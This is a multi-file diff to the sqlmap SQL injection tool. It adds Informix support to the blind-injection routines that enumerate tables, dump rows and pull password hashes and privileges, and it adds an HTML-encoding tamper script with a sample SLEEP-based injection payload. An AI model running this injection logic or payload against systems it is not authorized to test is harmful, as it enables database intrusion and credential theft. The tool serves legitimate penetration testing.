@@ -335,7 +336,7 @@ class Databases:
query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.blind.query % index query = rootQuery.blind.query % index
elif Backend.isDbms(DBMS.HSQLDB): elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX):
query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db)) query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db))
else: else:
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
@@ -603,8 +604,17 @@ class Databases:
if len(columnData) == 1: if len(columnData) == 1:
columns[name] = None columns[name] = None
else: else:
key = int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1]
if Backend.isDbms(DBMS.FIREBIRD): if Backend.isDbms(DBMS.FIREBIRD):
columnData[1] = FIREBIRD_TYPES.get(int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1], columnData[1]) columnData[1] = FIREBIRD_TYPES.get(key, columnData[1])
elif Backend.isDbms(DBMS.INFORMIX):
notNull = False
if isinstance(key, int) and key > 255:
key -= 256
notNull = True
columnData[1] = INFORMIX_TYPES.get(key, columnData[1])
if notNull:
columnData[1] = "%s NOT NULL" % columnData[1]
columns[name] = columnData[1] columns[name] = columnData[1]
@@ -656,6 +666,10 @@ class Databases:
query = rootQuery.blind.count % (tbl) query = rootQuery.blind.count % (tbl)
query += condQuery query += condQuery
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
query += condQuery
elif Backend.isDbms(DBMS.SQLITE): elif Backend.isDbms(DBMS.SQLITE):
query = rootQuery.blind.query % tbl query = rootQuery.blind.query % tbl
value = unArrayizeValue(inject.getValue(query, union=False, error=False)) value = unArrayizeValue(inject.getValue(query, union=False, error=False))
@@ -712,6 +726,10 @@ class Databases:
query = rootQuery.blind.query % (tbl) query = rootQuery.blind.query % (tbl)
query += condQuery query += condQuery
field = None field = None
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
query += condQuery
field = condition
query = agent.limitQuery(index, query, field, field) query = agent.limitQuery(index, query, field, field)
column = unArrayizeValue(inject.getValue(query, union=False, error=False)) column = unArrayizeValue(inject.getValue(query, union=False, error=False))
@@ -744,11 +762,22 @@ class Databases:
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query2 % (tbl, column) query = rootQuery.blind.query2 % (tbl, column)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl, column)
colType = unArrayizeValue(inject.getValue(query, union=False, error=False)) colType = unArrayizeValue(inject.getValue(query, union=False, error=False))
key = int(colType) if isinstance(colType, basestring) and colType.isdigit() else colType
if Backend.isDbms(DBMS.FIREBIRD): if Backend.isDbms(DBMS.FIREBIRD):
colType = FIREBIRD_TYPES.get(colType, colType) colType = FIREBIRD_TYPES.get(key, colType)
elif Backend.isDbms(DBMS.INFORMIX):
notNull = False
if isinstance(key, int) and key > 255:
key -= 256
notNull = True
colType = INFORMIX_TYPES.get(key, colType)
if notNull:
colType = "%s NOT NULL" % colType
column = safeSQLIdentificatorNaming(column) column = safeSQLIdentificatorNaming(column)
columns[column] = colType columns[column] = colType

View File

@@ -110,6 +110,9 @@ class Entries:
kb.data.cachedColumns = foundData kb.data.cachedColumns = foundData
try: try:
if Backend.isDbms(DBMS.INFORMIX):
kb.dumpTable = "%s:%s" % (conf.db, tbl)
else:
kb.dumpTable = "%s.%s" % (conf.db, tbl) kb.dumpTable = "%s.%s" % (conf.db, tbl)
if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \
@@ -236,6 +239,8 @@ class Entries:
query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl))
elif Backend.isDbms(DBMS.MAXDB): elif Backend.isDbms(DBMS.MAXDB):
query = rootQuery.blind.count % tbl query = rootQuery.blind.count % tbl
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.count % (conf.db, tbl)
else: else:
query = rootQuery.blind.count % (conf.db, tbl) query = rootQuery.blind.count % (conf.db, tbl)
@@ -316,14 +321,13 @@ class Entries:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())),
index)
elif Backend.isDbms(DBMS.SQLITE): elif Backend.isDbms(DBMS.SQLITE):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index)
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0])
query = whereQuery(query) query = whereQuery(query)

View File

@@ -27,10 +27,11 @@ from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.data import queries from lib.core.data import queries
from lib.core.dicts import DB2_PRIVS
from lib.core.dicts import FIREBIRD_PRIVS
from lib.core.dicts import INFORMIX_PRIVS
from lib.core.dicts import MYSQL_PRIVS from lib.core.dicts import MYSQL_PRIVS
from lib.core.dicts import PGSQL_PRIVS from lib.core.dicts import PGSQL_PRIVS
from lib.core.dicts import FIREBIRD_PRIVS
from lib.core.dicts import DB2_PRIVS
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
@@ -251,6 +252,9 @@ class Users:
if user in retrievedUsers: if user in retrievedUsers:
continue continue
if Backend.isDbms(DBMS.INFORMIX):
count = 1
else:
infoMsg = "fetching number of password hashes " infoMsg = "fetching number of password hashes "
infoMsg += "for user '%s'" % user infoMsg += "for user '%s'" % user
logger.info(infoMsg) logger.info(infoMsg)
@@ -282,11 +286,14 @@ class Users:
query = rootQuery.blind.query2 % (user, index, user) query = rootQuery.blind.query2 % (user, index, user)
else: else:
query = rootQuery.blind.query % (user, index, user) query = rootQuery.blind.query % (user, index, user)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,)
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index)
password = unArrayizeValue(inject.getValue(query, union=False, error=False)) password = unArrayizeValue(inject.getValue(query, union=False, error=False))
password = parsePasswordHash(password) password = parsePasswordHash(password)
passwords.append(password) passwords.append(password)
if passwords: if passwords:
@@ -470,6 +477,9 @@ class Users:
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
user = "%%%s%%" % user user = "%%%s%%" % user
if Backend.isDbms(DBMS.INFORMIX):
count = 1
else:
infoMsg = "fetching number of privileges " infoMsg = "fetching number of privileges "
infoMsg += "for user '%s'" % outuser infoMsg += "for user '%s'" % outuser
logger.info(infoMsg) logger.info(infoMsg)
@@ -514,6 +524,8 @@ class Users:
query = rootQuery.blind.query2 % (user, index) query = rootQuery.blind.query2 % (user, index)
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, user) query = rootQuery.blind.query % (index, user)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,)
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index)
@@ -561,6 +573,10 @@ class Users:
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
privileges.add(FIREBIRD_PRIVS[privilege.strip()]) privileges.add(FIREBIRD_PRIVS[privilege.strip()])
# In Informix we get one letter for the highest privilege
elif Backend.isDbms(DBMS.INFORMIX):
privileges.add(INFORMIX_PRIVS[privilege.strip()])
# In DB2 we get Y or G if the privilege is # In DB2 we get Y or G if the privilege is
# True, N otherwise # True, N otherwise
elif Backend.isDbms(DBMS.DB2): elif Backend.isDbms(DBMS.DB2):

View File

@@ -63,8 +63,6 @@ try:
from lib.core.testing import smokeTest from lib.core.testing import smokeTest
from lib.core.testing import liveTest from lib.core.testing import liveTest
from lib.parse.cmdline import cmdLineParser from lib.parse.cmdline import cmdLineParser
from lib.utils.api import setRestAPILog
from lib.utils.api import StdDbOut
except KeyboardInterrupt: except KeyboardInterrupt:
errMsg = "user aborted" errMsg = "user aborted"
logger.error(errMsg) logger.error(errMsg)
@@ -101,6 +99,15 @@ def checkEnvironment():
logger.critical(errMsg) logger.critical(errMsg)
raise SystemExit raise SystemExit
# Patch for pip (import) environment
if "sqlmap.sqlmap" in sys.modules:
for _ in ("cmdLineOptions", "conf", "kb"):
globals()[_] = getattr(sys.modules["lib.core.data"], _)
for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"):
globals()[_] = getattr(sys.modules["lib.core.exception"], _)
def main(): def main():
""" """
Main function of sqlmap when running from command line. Main function of sqlmap when running from command line.
@@ -117,6 +124,10 @@ def main():
initOptions(cmdLineOptions) initOptions(cmdLineOptions)
if hasattr(conf, "api"): if hasattr(conf, "api"):
# heavy imports
from lib.utils.api import StdDbOut
from lib.utils.api import setRestAPILog
# Overwrite system standard output and standard error to write # Overwrite system standard output and standard error to write
# to an IPC database # to an IPC database
sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
@@ -195,7 +206,7 @@ def main():
try: try:
if not checkIntegrity(): if not checkIntegrity():
errMsg = "code integrity check failed. " errMsg = "code integrity check failed (turning off automatic issue creation). "
errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "You should retrieve the latest development version from official GitHub "
errMsg += "repository at '%s'" % GIT_PAGE errMsg += "repository at '%s'" % GIT_PAGE
logger.critical(errMsg) logger.critical(errMsg)
@@ -203,6 +214,11 @@ def main():
dataToStdout(excMsg) dataToStdout(excMsg)
raise SystemExit raise SystemExit
elif "MemoryError" in excMsg:
errMsg = "memory exhaustion detected"
logger.error(errMsg)
raise SystemExit
elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")):
errMsg = "no space left on output device" errMsg = "no space left on output device"
logger.error(errMsg) logger.error(errMsg)

25
tamper/htmlencode.py Normal file
View File

@@ -0,0 +1,25 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
HTML encode (using code points) all non-alphanumeric characters
>>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
"""
return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload

View File

@@ -10,7 +10,7 @@ acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_
cc9c82cfffd8ee9b25ba3af6284f057e extra/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e extra/__init__.py
2237d0568236c354b0436d2cd9434f97 extra/mssqlsig/update.py 2237d0568236c354b0436d2cd9434f97 extra/mssqlsig/update.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/safe2bin/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e extra/safe2bin/__init__.py
cc5b67714d8a0b6b81d29a4f15634c16 extra/safe2bin/safe2bin.py a54bde99fd05fdb412cba5a8780f3e18 extra/safe2bin/safe2bin.py
d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_
2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ 2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_
c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_
@@ -19,56 +19,55 @@ b46521e29ea3d813bab5aeb16cac6498 extra/shutils/duplicates.py
05615626222060120450518136b14ba9 extra/shutils/regressiontest.py 05615626222060120450518136b14ba9 extra/shutils/regressiontest.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/sqlharvest/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e extra/sqlharvest/__init__.py
4f2f817596540d82f9fcc0c5b2228beb extra/sqlharvest/sqlharvest.py 4f2f817596540d82f9fcc0c5b2228beb extra/sqlharvest/sqlharvest.py
b704c0f943c015f6247cfae20048ae8e lib/controller/action.py 2daa39e4d59526acb4772b6c47eb315f lib/controller/action.py
d1451b43f3ac80bfbea8657e288865f8 lib/controller/checks.py 66cddf7f40c002d663d4401a440ec1aa lib/controller/checks.py
7c5ba631796f12d6de9b667e4cc7812b lib/controller/controller.py 242eb9edf447e09fa3f5d154495308e6 lib/controller/controller.py
5ae8f657fd4e8026fcc9624f5b5533fe lib/controller/handler.py 0a64305c3b3a01a2fc3a5e6204f442f1 lib/controller/handler.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/controller/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/controller/__init__.py
2689f320908964b2c88a3eb8265fd2dd lib/core/agent.py 04f16204c899438dc7599a9a8426bfee lib/core/agent.py
eb0bd28b0bd9fbf67dcc3119116df377 lib/core/bigarray.py eb0bd28b0bd9fbf67dcc3119116df377 lib/core/bigarray.py
1dd298ac06c961037bb76a675bb4b322 lib/core/common.py b1e2ccdeea8bf12feb839d403dc05796 lib/core/common.py
5680d0c446a3bed5c0f2a0402d031557 lib/core/convert.py 5680d0c446a3bed5c0f2a0402d031557 lib/core/convert.py
e77cca1cb063016f71f6e6bdebf4ec73 lib/core/data.py e77cca1cb063016f71f6e6bdebf4ec73 lib/core/data.py
1d042f0bc0557d3fd564ea5a46deb77e lib/core/datatype.py 1d042f0bc0557d3fd564ea5a46deb77e lib/core/datatype.py
e4ca0fd47f20cf7ba6a5f5cbf980073c lib/core/decorators.py e4ca0fd47f20cf7ba6a5f5cbf980073c lib/core/decorators.py
67f206cf2658145992cc1d7020138325 lib/core/defaults.py 67f206cf2658145992cc1d7020138325 lib/core/defaults.py
4a16002c5d9cd047c2e89ddc5db63737 lib/core/dicts.py 439cae0904cf3db20d1bc81d56980a21 lib/core/dicts.py
1f98d3f57ce21d625fd67adb26cfd13c lib/core/dump.py 1f98d3f57ce21d625fd67adb26cfd13c lib/core/dump.py
34a45b9bc68a6381247a620ddf30de1c lib/core/enums.py 1128705f593013359497b3959078b650 lib/core/enums.py
e4aec2b11c1ad6039d0c3dbbfbc5eb1a lib/core/exception.py e4aec2b11c1ad6039d0c3dbbfbc5eb1a lib/core/exception.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/core/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/core/__init__.py
91c514013daa796e2cdd940389354eac lib/core/log.py 91c514013daa796e2cdd940389354eac lib/core/log.py
b9779615206791e6ebbaa84947842b49 lib/core/optiondict.py 5b079749c50240602ea92637e268ed31 lib/core/optiondict.py
57109386dcff87507201f14a5821fd41 lib/core/option.py 16d9e1100189966d8a2224d23fcd2ca2 lib/core/option.py
1e8948dddbd12def5c2af52530738059 lib/core/profiling.py 1e8948dddbd12def5c2af52530738059 lib/core/profiling.py
e60456db5380840a586654344003d4e6 lib/core/readlineng.py e60456db5380840a586654344003d4e6 lib/core/readlineng.py
5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py 5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
99a2b496b9d5b546b335653ca801153f lib/core/revision.py 99a2b496b9d5b546b335653ca801153f lib/core/revision.py
7c15dd2777af4dac2c89cab6df17462e lib/core/session.py 7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
1a8eccb8108e213d7b7257302e82cef8 lib/core/settings.py 1d029b393fe525c9ad1ecac20b064ca5 lib/core/settings.py
7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py 7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py 23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
0bc2fae1dec18cdd11954b22358293f2 lib/core/target.py c3ace7874a536d801f308cf1fd03df99 lib/core/target.py
21b9aa385c851a4e8faaff9b985e29b8 lib/core/testing.py d43f059747ffd48952922c94152e2a07 lib/core/testing.py
424a6cf9bdfaf7182657ed7929d7df5a lib/core/threads.py 2cafee22d9f8018e7efff0a5e3178596 lib/core/threads.py
53c15b78e0288274f52410db25406432 lib/core/unescaper.py 53c15b78e0288274f52410db25406432 lib/core/unescaper.py
6bdc53e2ca152ff8cd35ad671e48a96b lib/core/update.py 6bdc53e2ca152ff8cd35ad671e48a96b lib/core/update.py
8485a3cd94c0a5af2718bad60c5f1ae5 lib/core/wordlist.py 8485a3cd94c0a5af2718bad60c5f1ae5 lib/core/wordlist.py
354ecc0c6d3e0ac9c06ed897c4d52edf lib/core/xmldump.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/__init__.py
c1288bc4ce5651dbdd82d4a9435fdc03 lib/parse/banner.py c1288bc4ce5651dbdd82d4a9435fdc03 lib/parse/banner.py
daea32290b63c43f7d1c0e14c66d4826 lib/parse/cmdline.py bc8a27a451d988398d7e25a786b2c8a2 lib/parse/cmdline.py
8ec4d4f02634834701f8258726f2e511 lib/parse/configfile.py 8ec4d4f02634834701f8258726f2e511 lib/parse/configfile.py
fe4e2152292587928edb94c9a4d311ff lib/parse/handler.py fe4e2152292587928edb94c9a4d311ff lib/parse/handler.py
8e6bfb13e5a34b2610f3ff23467a34cf lib/parse/headers.py 8e6bfb13e5a34b2610f3ff23467a34cf lib/parse/headers.py
c8e14fbfc6616d8149b2603c97abec84 lib/parse/html.py cfa7b4c52915e1d7d59409ed49f0e623 lib/parse/html.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/parse/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/parse/__init__.py
af6b8e1c6eb074b56bbd9cd80aebcd97 lib/parse/payloads.py af6b8e1c6eb074b56bbd9cd80aebcd97 lib/parse/payloads.py
b40a4c5d91770d347df36d3065b63798 lib/parse/sitemap.py b40a4c5d91770d347df36d3065b63798 lib/parse/sitemap.py
9299f21804033f099681525bb9bf51c0 lib/request/basicauthhandler.py 9299f21804033f099681525bb9bf51c0 lib/request/basicauthhandler.py
a3e83cfe7e6825fb1b70951ad290d2ae lib/request/basic.py 083e7f446909b12009e72ae8e5e5737c lib/request/basic.py
97fb6323bfb5f941b27cbdb00f9078e1 lib/request/comparison.py c48285682a61d49982cb508351013cb4 lib/request/comparison.py
8bc040159a145a1dfdf8a3fe76a0adbc lib/request/connect.py 3b35467cd761ed53dfb35a85d8d6590d lib/request/connect.py
49b4c583af68689de5f9acb162de2939 lib/request/direct.py 49b4c583af68689de5f9acb162de2939 lib/request/direct.py
1a46f7bb26b23ec0c0d9d9c95828241b lib/request/dns.py 1a46f7bb26b23ec0c0d9d9c95828241b lib/request/dns.py
70ceefe39980611494d4f99afb96f652 lib/request/httpshandler.py 70ceefe39980611494d4f99afb96f652 lib/request/httpshandler.py
@@ -82,12 +81,12 @@ b2ffd261947994f4a4af555d468b4970 lib/request/rangehandler.py
937b7e276f25ccac5a2ac0bf9b1ef434 lib/takeover/abstraction.py 937b7e276f25ccac5a2ac0bf9b1ef434 lib/takeover/abstraction.py
3ecf028d8d93025d2a12c6f6fc13adb2 lib/takeover/icmpsh.py 3ecf028d8d93025d2a12c6f6fc13adb2 lib/takeover/icmpsh.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/takeover/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/takeover/__init__.py
1d064463302b85b2241263ea48a83837 lib/takeover/metasploit.py 2d39688ec1b871005b520b6f1ed97ba6 lib/takeover/metasploit.py
7083825564c051a7265cfdd1a5e6629c lib/takeover/registry.py 7083825564c051a7265cfdd1a5e6629c lib/takeover/registry.py
7d6cd7bdfc8f4bc4e8aed60c84cdf87f lib/takeover/udf.py 7d6cd7bdfc8f4bc4e8aed60c84cdf87f lib/takeover/udf.py
f6e3084abd506925a8be3d1c0a6d058c lib/takeover/web.py d9bdcc17091374c53ad2eea7fd72a909 lib/takeover/web.py
9af83a62de360184f1c14e69b8a95cfe lib/takeover/xp_cmdshell.py 9af83a62de360184f1c14e69b8a95cfe lib/takeover/xp_cmdshell.py
927092550c89f8c3c5caad2b14af0830 lib/techniques/blind/inference.py 27d41f38de7348600309e1cb6741fb2e lib/techniques/blind/inference.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/blind/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/blind/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/brute/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/brute/__init__.py
d36effffe64e63ef9b3be490f850e2cc lib/techniques/brute/use.py d36effffe64e63ef9b3be490f850e2cc lib/techniques/brute/use.py
@@ -102,7 +101,7 @@ f5d6884cdeed28281187c111d3e49e3b lib/techniques/union/test.py
12ce1bb7ee5f1f23f58be12fe9fa8472 lib/techniques/union/use.py 12ce1bb7ee5f1f23f58be12fe9fa8472 lib/techniques/union/use.py
26c1babc6289fac9056f8b21d10f3bb1 lib/utils/api.py 26c1babc6289fac9056f8b21d10f3bb1 lib/utils/api.py
8cdc8c1e663c3b92a756fb7b02cc3c02 lib/utils/crawler.py 8cdc8c1e663c3b92a756fb7b02cc3c02 lib/utils/crawler.py
393f8fd1684308213e1d2e6a9d4258c2 lib/utils/deps.py e30011943692aa2fe7c1185974112bc0 lib/utils/deps.py
4dfd3a95e73e806f62372d63bc82511f lib/utils/getch.py 4dfd3a95e73e806f62372d63bc82511f lib/utils/getch.py
b1e83fc549334fae8f60552dcdad28cb lib/utils/hashdb.py b1e83fc549334fae8f60552dcdad28cb lib/utils/hashdb.py
0330607242d4f704ae6d7bba5f52ccae lib/utils/hash.py 0330607242d4f704ae6d7bba5f52ccae lib/utils/hash.py
@@ -115,7 +114,7 @@ cc9b0f68dd58a2576a5a454b7f5f6b9c lib/utils/search.py
4a0374ac0bc9d726446f04c77fbb5697 lib/utils/sqlalchemy.py 4a0374ac0bc9d726446f04c77fbb5697 lib/utils/sqlalchemy.py
8013e4a4c62ad916452434ea3c352a7a lib/utils/timeout.py 8013e4a4c62ad916452434ea3c352a7a lib/utils/timeout.py
e6fa0e76367a77015da113811dfd9712 lib/utils/versioncheck.py e6fa0e76367a77015da113811dfd9712 lib/utils/versioncheck.py
4759e0bb8931d461dfcad410ca05fc5d lib/utils/xrange.py adafdb28095ba2d03322fee2aae4548f lib/utils/xrange.py
988100b4a1cd3b07acfd8b6ec692aed5 plugins/dbms/access/connector.py 988100b4a1cd3b07acfd8b6ec692aed5 plugins/dbms/access/connector.py
27a5ae5611836b073dd53b21435f0979 plugins/dbms/access/enumeration.py 27a5ae5611836b073dd53b21435f0979 plugins/dbms/access/enumeration.py
438090ab8ca63d9c23831a5ffbef74d9 plugins/dbms/access/filesystem.py 438090ab8ca63d9c23831a5ffbef74d9 plugins/dbms/access/filesystem.py
@@ -144,6 +143,13 @@ c9d59b7c60aa0f0b23f920f932547e40 plugins/dbms/hsqldb/fingerprint.py
d278ad5f1c13fea871ed1120942244d5 plugins/dbms/hsqldb/__init__.py d278ad5f1c13fea871ed1120942244d5 plugins/dbms/hsqldb/__init__.py
d781720e15c23b662bae3098ed470756 plugins/dbms/hsqldb/syntax.py d781720e15c23b662bae3098ed470756 plugins/dbms/hsqldb/syntax.py
2f957281cfe80396f73a3dccc0cb6d45 plugins/dbms/hsqldb/takeover.py 2f957281cfe80396f73a3dccc0cb6d45 plugins/dbms/hsqldb/takeover.py
78917f19ea0750a665094d7dd7778d0c plugins/dbms/informix/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/informix/enumeration.py
e8f0f28da98020dce27970a50e10a23b plugins/dbms/informix/filesystem.py
89540595a6011b47629c68d11a5e4533 plugins/dbms/informix/fingerprint.py
99a77ad7aa7ca4a4b5981f2fa0d9c616 plugins/dbms/informix/__init__.py
8300ca02ecf00d3b00d78ecde8a86c09 plugins/dbms/informix/syntax.py
5f130772d2295ae61140acba894eaceb plugins/dbms/informix/takeover.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/dbms/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e plugins/dbms/__init__.py
4c8667e8af763ddf82ee314c6681d4e1 plugins/dbms/maxdb/connector.py 4c8667e8af763ddf82ee314c6681d4e1 plugins/dbms/maxdb/connector.py
075fd66b8bbabed18aeb304c6c0ef2a2 plugins/dbms/maxdb/enumeration.py 075fd66b8bbabed18aeb304c6c0ef2a2 plugins/dbms/maxdb/enumeration.py
@@ -162,7 +168,7 @@ f3da9f5298dac5d1f468828c07c81f70 plugins/dbms/mssqlserver/takeover.py
d8cd212ba7be09483af3f32256b71f05 plugins/dbms/mysql/connector.py d8cd212ba7be09483af3f32256b71f05 plugins/dbms/mysql/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/mysql/enumeration.py d251aecff7544f79f78385386bb7fa35 plugins/dbms/mysql/enumeration.py
a970f90c91ebd3a7e22955424fe5414e plugins/dbms/mysql/filesystem.py a970f90c91ebd3a7e22955424fe5414e plugins/dbms/mysql/filesystem.py
eed5093257e65adfae7bb56c5a6d3eb0 plugins/dbms/mysql/fingerprint.py edc62bbf269d053ccc68b4cdfebdf12b plugins/dbms/mysql/fingerprint.py
a4535cb3873ada344e6e61dbe1a546d3 plugins/dbms/mysql/__init__.py a4535cb3873ada344e6e61dbe1a546d3 plugins/dbms/mysql/__init__.py
4ad721acc40a964fc67154dd4683870e plugins/dbms/mysql/syntax.py 4ad721acc40a964fc67154dd4683870e plugins/dbms/mysql/syntax.py
aa88b5d6198cd31d9ab2be664da9a265 plugins/dbms/mysql/takeover.py aa88b5d6198cd31d9ab2be664da9a265 plugins/dbms/mysql/takeover.py
@@ -176,7 +182,7 @@ cac6bd84d44ac929da6800719279875b plugins/dbms/oracle/takeover.py
6c54ca5c9efad3e437467f9fe44435d6 plugins/dbms/postgresql/connector.py 6c54ca5c9efad3e437467f9fe44435d6 plugins/dbms/postgresql/connector.py
419dd50e6688fef760fec4f71430fb29 plugins/dbms/postgresql/enumeration.py 419dd50e6688fef760fec4f71430fb29 plugins/dbms/postgresql/enumeration.py
9756fc02fc84719c3e330fcc7914bf17 plugins/dbms/postgresql/filesystem.py 9756fc02fc84719c3e330fcc7914bf17 plugins/dbms/postgresql/filesystem.py
28bce42dac3ee8efccc78c7a58b170b6 plugins/dbms/postgresql/fingerprint.py 5bd67a898b9671c78b00b9299674e6d7 plugins/dbms/postgresql/fingerprint.py
0e7d17abf68f1dd770e969c84878d246 plugins/dbms/postgresql/__init__.py 0e7d17abf68f1dd770e969c84878d246 plugins/dbms/postgresql/__init__.py
8711e7c1265a5e651c9aadca7db40cd5 plugins/dbms/postgresql/syntax.py 8711e7c1265a5e651c9aadca7db40cd5 plugins/dbms/postgresql/syntax.py
50d8070e687e5806058a121311a36385 plugins/dbms/postgresql/takeover.py 50d8070e687e5806058a121311a36385 plugins/dbms/postgresql/takeover.py
@@ -196,8 +202,8 @@ d0c7cc8ec2aa716b2e5cd3b5ab805c3a plugins/dbms/sybase/__init__.py
7a1c6cb238b5b464e1e9641469e6e503 plugins/dbms/sybase/takeover.py 7a1c6cb238b5b464e1e9641469e6e503 plugins/dbms/sybase/takeover.py
